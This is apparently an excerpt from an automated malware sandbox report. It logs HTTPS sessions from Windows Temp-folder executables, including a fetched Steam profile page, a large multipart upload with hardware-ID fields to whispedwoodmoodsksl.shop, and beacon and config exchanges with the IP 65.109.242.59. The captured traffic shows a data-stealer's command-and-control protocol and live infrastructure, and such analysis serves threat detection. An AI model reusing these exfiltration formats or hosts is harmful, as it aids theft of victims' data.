                                                                              2024-05-26 08:23:08 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                              2024-05-26 08:23:08 UTC16384INData Raw: 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62
                                                                              Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                                              2024-05-26 08:23:08 UTC3768INData Raw: 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 36 38 39 37 31 37 38 39 39 2f 62 61 64 67 65 73 22 3e 0d 0a 09 09 09 09 09 09 09
                                                                              Data Ascii: <div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199689717899/badges">
                                                                              2024-05-26 08:23:08 UTC1028INData Raw: 20 74 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0d 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f
                                                                              Data Ascii: this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.452661188.114.96.34433192C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:08 UTC291OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 582478
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 31 35 30 37 43 46 33 45 33 45 43 43 44 45 31 37 43 34 31 31 45 39 38 42 38 39 37 35 45 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1B1507CF3E3ECCDE17C411E98B8975E0--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: c5 83 94 47 11 9c a3 ff 45 bc 04 4c 4b 21 b0 0f f7 51 25 01 2a f0 04 94 3f 0f 76 1c d1 38 0c de 49 37 6e a6 82 53 11 36 cf ac 67 39 fc e6 12 40 76 61 f1 ed ff b7 32 52 0a c8 4e 6b 01 04 90 5c 08 c9 b3 0e a0 dc 1f 4d c3 68 20 1c 8b 64 32 a0 c4 9e fd 3e 10 0d a8 5f ac 9e 7f 53 24 2f 8e a8 8b 1e b5 03 85 02 38 c4 96 ed fa e5 da fd 14 a2 69 c6 1a d8 5a 2b 8c 36 ba 49 78 01 1e 7e 62 5b 23 d5 53 c0 6e 30 5c d3 95 9c f5 5e a8 1c ad 8d 4b 95 a0 d2 46 3e ec fc 7c c3 39 7e df 38 38 5e c9 ba a0 1d 77 fa 58 46 93 9f 2a e8 78 42 0d 7e a7 5a a7 22 16 b1 65 e5 ba b3 34 68 d7 bc 5d d8 8d 36 3e 11 d6 bc 50 ad ec d6 e2 c8 8f c6 63 24 4b 40 5b a4 91 79 98 9f 7c 06 1d 93 77 93 68 05 11 1d 42 40 f8 ce ad 5a d7 95 b8 82 32 f4 61 70 3d 54 b7 7c e3 7d 2f 75 80 e7 5d 31 6b 94 a9
                                                                              Data Ascii: GELK!Q%*?v8I7nS6g9@va2RNk\Mh d2>_S$/8iZ+6Ix~b[#Sn0\^KF>|9~88^wXF*xB~Z"e4h]6>Pc$K@[y|whB@Z2ap=T|}/u]1k
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: 8b b1 89 1e 50 6a 9b fd 3e 81 fa c1 9b 93 48 ba 8a 04 4d 21 71 cd ff 08 e9 ed d8 31 eb 2e c3 9a 9a d2 a7 63 e5 c7 6a e3 c1 4a 2a 99 30 2a 3d 92 6e 1e 2c 73 12 de 30 8a 34 4f 20 f8 e0 88 18 e6 31 e7 c7 1b c7 e7 a2 0e b7 99 c3 41 74 c3 b8 b5 1f d8 38 1f bf 2d ef 21 05 07 6a 9f e8 69 3b 37 99 30 bf fd c4 85 91 a7 31 c4 3e 01 7b 1f 7e fa 9b c3 5b 19 3e 56 93 3b 23 46 af ac ad 22 9c 04 f0 87 d8 59 92 3b 67 74 9e 3c d5 47 bc b4 a9 a1 e2 e2 ad 8e de 6c 41 93 c1 3b ae 48 f8 f6 43 3b e7 97 02 96 98 72 92 5a ba f6 58 8b 6b c7 cc fc 45 8c 67 bf 5d 49 7a 25 8f 89 de 5d f6 fc 89 45 dc c6 d9 85 4f fa 0d 73 c6 4d 09 d8 96 4f e0 b9 78 04 a1 47 78 4a f3 ab bb e2 8b fa ca 1e c3 7a 33 83 02 d8 1a 52 a0 aa 45 5a 34 45 94 e2 31 2c d1 ae 87 df d7 94 52 ee d7 19 f5 03 0f 57 fc
                                                                              Data Ascii: Pj>HM!q1.cjJ*0*=n,s04O 1At8-!ji;701>{~[>V;#F"Y;gt<GlA;HC;rZXkEg]Iz%]EOsMOxGxJz3REZ4E1,RW
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: a8 aa 52 b0 02 e5 6b 1e 52 54 1c 08 12 ca f6 de 27 5c e8 cb 30 b0 0b e4 c8 f6 07 b1 43 55 81 60 d6 ca 25 0f 81 d3 02 46 03 aa 99 59 01 c7 2e 99 dd a6 17 41 e0 20 ca 8b 1f 2c 54 86 3f fa b3 5f d4 78 07 75 a4 11 fa 59 5e e7 88 5f 72 22 06 0d 32 22 ed c7 7b 04 e6 35 1e a0 e3 cb 43 d8 fd 35 8f bf 23 8f de c0 3c bf eb 24 21 30 26 48 db 29 59 f6 35 fb e8 75 b0 c8 10 39 33 39 ef cf be 98 b0 df b0 6c b0 e3 d4 48 e3 d0 9c 65 eb 60 fd 16 c0 0e fa 3e 12 e6 39 d7 52 b3 cf 18 3f b4 b8 1d bd 95 32 39 d6 42 6b de 97 7c 8a 7e b3 ae de 1d 3a a7 cb e7 43 05 33 17 5e 53 83 13 fa 22 35 08 b5 b6 fc 9f fe 96 70 b8 7b 2f bc 29 24 46 f8 44 df 73 1c 31 3e 04 f4 0e f8 ef 70 7b a2 48 53 f8 86 af 51 9a 3f f2 00 1a 1f bc 25 b4 19 d4 5a 13 2c 7c f4 10 12 cb e0 c6 85 67 bf 20 5f 3d 2f
                                                                              Data Ascii: RkRT'\0CU`%FY.A ,T?_xuY^_r"2"{5C5#<$!0&H)Y5u939lHe`>9R?29Bk|~:C3^S"5p{/)$FDs1>p{HSQ?%Z,|g _=/
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: c9 1c 6c 58 b7 29 e5 01 e2 52 77 01 4c 11 5d 5d 3c 12 61 38 49 7e c0 7f 14 83 94 de fa 63 4c 3f 99 ce 72 38 7c 65 be 2f 57 6c e0 46 83 2e 0a 88 33 1f 43 b4 36 36 21 51 b2 17 cd fc 76 e3 83 23 1f a6 9f 8c ba d3 d3 27 40 90 8c 0e 97 59 2f 51 37 8d e4 75 87 40 e0 69 1c a3 6c 75 d0 ee c2 5e 3f e2 d1 10 bb ee bd c4 c6 98 07 00 17 95 45 df da 7e 88 8d e4 b5 54 02 b0 94 5b 1d 37 3c d3 31 88 92 3d 4f cf 06 c3 46 93 a7 d9 5e df e7 dd a3 52 94 0a aa 5d c7 45 00 09 2d aa 32 ed 52 29 74 ce af 92 d6 93 b5 ed 85 d9 89 35 a8 3b 09 6b 53 70 91 09 73 fc b5 c4 0f 2e ee aa fb 29 cc 73 c7 17 41 af fb fc 2b 34 12 15 c6 bf de d7 4a 15 5b 2c c4 c4 d2 f1 92 a7 1a fb 4c 8c 14 a5 d5 11 2f b4 6c ad f1 13 00 b5 56 2f 8e c3 4e 27 f0 14 6d e9 de e0 6c 65 68 08 43 af 0d 67 46 3e 38 2e
                                                                              Data Ascii: lX)RwL]]<a8I~cL?r8|e/WlF.3C66!Qv#'@Y/Q7u@ilu^?E~T[7<1=OF^R]E-2R)t5;kSps.)sA+4J[,L/lV/N'mlehCgF>8.
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: 64 6f 10 d3 13 c9 83 0a d2 38 c2 b1 a8 72 32 33 c8 6f ba 48 3d 8d 14 04 26 50 b0 d8 0a b4 d0 5d 1a a6 f1 db 75 a4 4a 01 97 64 8d 19 1e 38 24 a0 83 e8 b2 6f e2 fb b7 70 da 5c 2a bb 76 f5 f1 fe 5a 57 cc 19 89 23 37 d4 85 b9 ff 17 13 0d 87 cd a5 79 73 e9 a8 29 a9 73 02 9b b9 28 9a 8a 6a 7f 2c 01 b9 91 f5 cd c1 8b 03 a1 e4 2e 81 85 07 6a a0 cf d7 36 64 eb 86 88 7b e9 81 9e ca 35 96 08 d8 c9 95 dc 88 ea db 62 ee 16 40 95 49 a8 fd 20 23 31 48 8f 0b 76 58 03 89 87 e8 93 28 20 7e d0 4e 02 1c dd e4 7b f3 0f f9 97 83 c1 e7 dd 3a a3 4d d6 af a9 6b 29 ce af 7e 88 a7 35 e0 5c bb 36 7f 9a 6a 04 5b 16 94 ff 13 fc aa bf 9c 71 ac fc ca ec 20 95 b8 51 ed d7 f9 05 33 55 16 1d 30 3b 25 78 d0 5e 7e 2b 61 6f 7f ff b9 14 ce 23 d3 e0 61 91 15 60 19 6d 94 f8 bd 3c f4 9f 06 e6 bf
                                                                              Data Ascii: do8r23oH=&P]uJd8$op\*vZW#7ys)s(j,.j6d{5b@I #1HvX( ~N{:Mk)~5\6j[q Q3U0;%x^~+ao#a`m<
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: 68 29 b3 80 66 3b 4c 1d 7a 2e cf 31 a3 d7 7c 94 c3 98 ab 00 e6 c8 53 c3 d3 17 ca 47 48 f7 cb 6d 23 0e 97 a6 8f fd f0 44 b4 28 4e f6 36 b0 7c 5d 20 06 ce 1e 07 5e f9 db 07 57 18 81 56 9e ff 7d 38 ac 6a ba cc d8 73 8b 31 b9 1c 21 b1 a0 d2 27 ff 47 4c 36 76 ea be d3 44 c0 74 f0 69 a9 04 ab 04 86 eb 62 e9 27 6c b0 fd c3 86 2e 95 de 94 29 9f 2f d7 ae 54 29 72 23 34 c4 1f 0f a6 07 a9 f5 ef 45 08 52 56 04 8e bb b1 3d 9a 36 ef 7e ea 7f 03 8c 24 6e f1 20 f1 eb 0d 40 12 e6 72 32 f5 b8 00 6d 27 41 e2 1e a7 f8 37 ca 0e 03 3e a2 d5 14 bd c1 61 31 19 14 ac 81 e8 64 4a 03 24 81 82 83 76 13 3f 82 2a 84 58 99 84 e9 2f 98 41 c4 bf 32 77 50 13 85 3c 81 63 99 72 01 f8 5f 8b 6d 62 f4 44 74 e2 e0 d0 57 72 ee eb 43 25 b7 ae bf 9a ba 38 ad b7 8d bc 68 82 4d 06 46 64 dd 65 04 5f
                                                                              Data Ascii: h)f;Lz.1|SGHm#D(N6|] ^WV}8js1!'GL6vDtib'l.)/T)r#4ERV=6~$n @r2m'A7>a1dJ$v?*X/A2wP<cr_mbDtWrC%8hMFde_
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: 81 f1 e1 38 88 45 62 18 47 5f 00 70 49 62 77 b0 a8 44 0b fb d5 66 d1 c5 a1 f5 c4 d0 0f 25 89 25 ea 5f 0d 76 21 40 8b 1f 8f c4 ae ff 26 5a ae 38 b8 d1 bd c6 e5 56 59 3e 01 6d bc 8d 0b f6 0e ec 0a 46 fa c3 3f f4 91 b4 0c 6e 16 ea 60 36 1a 86 73 8c 34 3d 38 65 45 2e 70 74 b0 c3 85 0d 93 45 d2 83 df db 63 cd 79 ed 06 33 3c 75 cf 11 a0 dd 2d d7 27 00 a4 56 3b 25 c5 db 3a f7 6c cf d5 19 ea 39 1d 50 d9 1c 5e 9d 73 e0 37 f2 42 d5 9c 72 46 00 fa 68 21 8b f1 3d de 54 cd ee 8c aa 7e f2 bb 9a 3f b1 5a 8a 11 23 82 40 cc e8 f6 2d 34 fc 4a 36 c2 19 15 f7 14 0d 76 91 98 ae 63 18 cf 3b 40 fb 46 04 94 81 a8 94 60 4f a1 41 71 24 bc 67 e2 13 df 6e de e8 ce 29 3b cf df b3 9e c0 4a 47 c0 dd 8c c9 df b6 6f 55 69 46 af 32 06 5c 01 c9 99 71 0e 14 d8 a3 f4 d1 40 92 2b 62 75 ac e0
                                                                              Data Ascii: 8EbG_pIbwDf%%_v!@&Z8VY>mF?n`6s4=8eE.ptEcy3<u-'V;%:l9P^s7BrFh!=T~?Z#@-4J6vc;@F`OAq$gn);JGoUiF2\q@+bu
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: 04 d8 78 66 0d d6 fb a5 5a f7 be ea 1a 04 32 42 ab 13 b8 8e 7d 04 c9 e7 c4 9e 08 41 ae 8c c8 6b 24 81 81 67 e1 b5 09 6d 89 84 24 51 46 35 18 ee fa 7a 8c 95 cc 99 d1 ba 94 91 16 61 0c 0c 11 66 c6 99 2d 94 47 81 84 e9 21 bb a1 0c ad b5 ae a1 64 ae ee 92 09 4e 68 be c5 bd 99 95 a8 c1 e0 03 9d bc f7 2e dd 7b d1 d8 28 a6 f8 4b 20 14 6f 9c e2 d3 6a 31 24 e7 59 51 58 63 22 d9 69 19 9c 98 de fe ff 1b 9f 93 b9 e8 e9 86 82 fd 56 35 6f bc 78 3e 78 96 4f 6a ee a2 bc 2c 40 57 ce be 7a f8 1c 04 de aa 63 e3 2e 0d 67 30 4f 63 b8 a9 af 35 7a 47 13 db 18 ff ac 6e 17 5e 2a 14 87 50 5a 07 a3 b7 27 bf db 43 19 c8 dd d5 b7 17 aa 3e e6 90 a8 ad 6d 88 90 04 0e 3d 98 ad 83 83 d3 03 d0 ff fd 05 13 6c d1 d6 dc e7 1c c0 64 bc 69 3d 8e 05 c7 ed b3 5e d4 7c fc f7 7c 50 3b 64 b5 4a 4c
                                                                              Data Ascii: xfZ2B}Ak$gm$QF5zaf-G!dNh.{(K oj1$YQXc"iV5ox>xOj,@Wzc.g0Oc5zGn^*PZ'C>m=ldi=^||P;dJL
                                                                              2024-05-26 08:23:09 UTC15331OUTData Raw: 2f 38 54 19 89 a8 b8 4c 28 44 69 35 08 9b 61 90 e3 e5 c4 9e e8 c1 56 cc 58 2d 84 0d a0 2a 9d 2d 41 fd 11 8e 0a 2e d0 e9 0c 6d e8 9e 5d 05 a7 9c f6 e3 1c 15 14 c2 93 0e 47 fd 54 d4 3f af 67 be f4 c9 e1 2e 37 e1 e4 9b f1 06 24 38 cd af b0 71 5b 18 f9 40 cb ad cf ef 04 5a d4 73 e4 2d 33 f2 e2 25 d7 3e 36 96 ac 1b 42 8c 07 7b 6d aa 1d bf 55 57 5c 8a 5e 4c 64 59 43 54 1c 0b 02 08 61 71 d1 4b 6b 17 4e 23 46 db 7f 66 cd 56 61 17 46 1d 76 8f a7 e3 3c c9 56 fd 74 fd ef b2 b6 94 aa d7 2a b4 9e bf 4e 60 63 33 cf f9 62 76 01 6a ff 83 08 02 18 2e 9d b5 0f 16 17 39 40 4d ec 8c a2 fb b2 bd d3 32 6c a0 8c fa 3b 82 10 a6 72 21 45 1a 50 fd 47 0f 29 21 be 8b 75 81 c6 6d 13 d2 fd 74 01 ae 18 10 5f 13 43 99 83 30 1a f2 0a 3e c1 57 40 1c 55 c3 07 b6 c4 97 80 30 6c 88 5e cb e2
                                                                              Data Ascii: /8TL(Di5aVX-*-A.m]GT?g.7$8q[@Zs-3%>6B{mUW\^LdYCTaqKkN#FfVaFv<Vt*N`c3bvj.9@M2l;r!EPG)!umt_C0>W@U0l^
                                                                              2024-05-26 08:23:12 UTC804INHTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:23:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=papo0m3jaro2vji3c45901mahb; expires=Thu, 19-Sep-2024 02:09:51 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=buqwfg70GokUwk84ynHLRHmF2gh5QFEWzoty4BUo0DMxuhT7vwSu0WhgfmioCfLzm40fwZQDOttDjtAiiLNmnKcLw9qVNglTsUte5YERyu12Ycb3apmPzwkvjk124uWGsPwDFIdh53Sa3H4%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5c89aadd41c3-EWR
                                                                              alt-svc: h3=":443"; ma=86400


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.45266265.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:09 UTC186OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:10 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.45266365.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:11 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCB
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 279
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:11 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 33 46 43 42 33 35 46 36 30 33 38 31 30 32 38 39 34 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d
                                                                              Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="hwid"2683FCB35F603810289448-a33c7340-61ca-11ee-8c18-806e6f6e6963------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------
                                                                              2024-05-26 08:23:11 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:11 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 3a1|1|1|1|d2ebfa196795aa7682e7f079a5f59ae7|1|1|1|1|1|50000|10


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.45266465.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:12 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IIEBGIDAAFHIJJJJEGCGCont
                                                                              2024-05-26 08:23:13 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
